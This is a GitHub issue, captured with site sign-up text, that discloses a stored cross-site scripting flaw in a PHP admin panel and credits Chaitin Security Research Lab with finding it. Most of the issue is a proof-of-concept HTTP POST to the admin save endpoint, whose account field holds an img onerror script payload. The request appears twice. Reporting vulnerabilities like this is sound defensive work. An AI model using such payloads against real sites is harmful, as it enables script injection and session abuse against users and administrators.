Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
{"id":"","cover":"","account":"test<img src=1 onerror=alert("xss");>","email":"aa@xxxqq.com","nickname":"aa@xxxqq.com","login_count":"","group_id":1,"password":"aa@xxxqq.com","status":1,"create_time":"","theme":"template"}
then you can view xss in url http://192.168.3.129:8091/admin1#admin/index
The text was updated successfully, but these errors were encountered:
find by Chaitin Security Research Lab
Sorry, something went wrong.
No branches or pull requests
url
http://192.168.3.129:8091/admin1#admin/index

poc POST /admin1/admin/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 224 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/admin/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close{"id":"","cover":"","account":"test<img src=1 onerror=alert("xss");>","email":"aa@xxxqq.com","nickname":"aa@xxxqq.com","login_count":"","group_id":1,"password":"aa@xxxqq.com","status":1,"create_time":"","theme":"template"}

then you can view xss in url

http://192.168.3.129:8091/admin1#admin/index
The text was updated successfully, but these errors were encountered: